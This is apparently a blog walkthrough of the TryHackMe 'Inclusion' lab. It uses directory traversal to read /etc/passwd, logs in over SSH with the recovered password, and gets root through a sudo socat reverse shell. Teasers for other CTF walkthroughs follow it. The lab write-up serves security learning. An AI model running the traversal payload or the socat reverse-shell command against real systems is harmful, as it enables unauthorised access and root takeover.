Try-Hack-me: INCLUSION walkthrough

 

Try-hack-me

INCLUSION : Walkthrough

This room is meant to be a beginner’s introduction to local file inclusion, a vulnerability which occurs when some web-app includes files from its own local directories.
Let us start with enumeration. Run nmap  to get the services running on open ports and their versions.
#nmap -A -sC -sV <target IP>

Here, HTTP is open. SSH is as well, which we’ll use later.
When we connect to machine's IP, we get to see few articles.
The LFI page source:


The page source on this machine tells us that “lfiattack” is a local file that the web server is just showing up. If you read the article, it gives us a hint for exploiting this. It’s called a directory traversal attack, and it can be accomplished here by replacing the file name with “../../../../etc/passwd.

Going to our malicious URL will display the Linux file containing the password information for the users on the machine. Simply make note of the password listed for user “falconfeast” and use those credentials to SSH in.
Let's go for ssh connection of falconfeast:

#ssh falconfeast@<target IP>

We can now simply grab the user flag

#ls -la

#cat user.txt


Now is the turn for privilege escalation, so let's enumerate

#sudo -l  

In enumeration, we notice that we can run socat as root. We can find the privesc method on GTFOBins page here .
Firstly, we need to use socat to create a listener on machine.

#socat file: 'tty' , raw,echo=0 tcp-listen:5151
Socat Listener
Now, running socat as root we created the reverse shell.

#RHOST=<local IP>

#RPORT=5151

#sudo /usr/bin/socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
Getting back to our terminal where we set up the listener we can see we got the reverse shell and we are root.
And now we can get our final flag.


Thank you very much for reading. I hope you find this blog useful.

!!!!Happy Hacking!!!!




Comments

Post a Comment

Popular posts from this blog

Image
  Try-hack-me PICKLE-RICK : Walkthrough Today I completed an other room on tryhackme with a Rick and Morty theme to it! Let's go and complete the room Pickle Rick from try Hack Me! Scanning & Enumeration A good rule of thumb is to start by scanning your machine for any open ports.  #nmap -T4 -sC -sV -A -p- <target IP> Enumerating Services Port 22- ssh Here we are able to see that our SSH port is open. This port isn't too vulnerable unless we have found some credentials. So we will not mess with it. Port 80- http It's here where we find a webservice. Lets see if there is anything interesting. This webpage comes up on port 80. There’s no useful data in here. But what if we check the page source? Checking out the source code of a page can reveal all sorts of things.  Great it looks like we have found a user name!!!  Most websites will have a robots.txt file that will tell a browser what is and isn't allowed to index. So lets see if there is one for this site....
Read more

Try Hack Me - Simple CTF

Image
  Try Hack Me    Simple CTF Walkthrough Simple CTF  Challenge on TryHackMe Platform is a beginner level CTF, if you want to learn about CTF's, this room is perfect for you! So let’s get going! Initially, let's deploy our machine get connected to THM VPN and then, we are ready to begin. We need to run a Nmap scan against the machine so that we know which ports are open and which services are operational on these ports. I am going to use an aggressive Nmap scan.   #nmap -A -sC -Pn <Target IP> Analyzing the above Nmap scan we now know the number of ports and their associated services that are running on the host. So we have 2 services running under port 1000 and ssh service running on the higher port. Also, as highlighted above, w e see that we have got an anonymous ftp login, let’s try to log in and see if we can find anything. From ftp access as shown above, we are able to gather some information as ForMitch.txt. We will further extract the file and le...
Read more
Image
  Try-hack-me Agent Sudo : Walkthrough Agent Sudo is an Easy room on Tryhackme created by Deskel. This machine requires enumeration, hash cracking, steganography, and Privilege Escalation. Alright the room has a total of 5 tasks, or 4 if you just want to count the actual tasks. Task 1 has a note from the room author DesKel to have fun! Deploy the machine, wait a few minutes for it to boot and we will dive right in. Enumerate Everyone has got to be familiar with the first step after getting a machine IP by now, I hope? We do some port scanning and recon using our favorite tool Nmap #nmap -sS -sV -A -T4 -vv <target ip> Looks like we have some open ports running on the machine. A web server is running on port 80. Let's open it and investigate further. We get a html page that tells us that agents should use their own codename as user-agent to access the site. We see an announcement for the Agents from Agent R. The tryhackme hint was to change the “User-agent” with “C”. So we sta...
Read more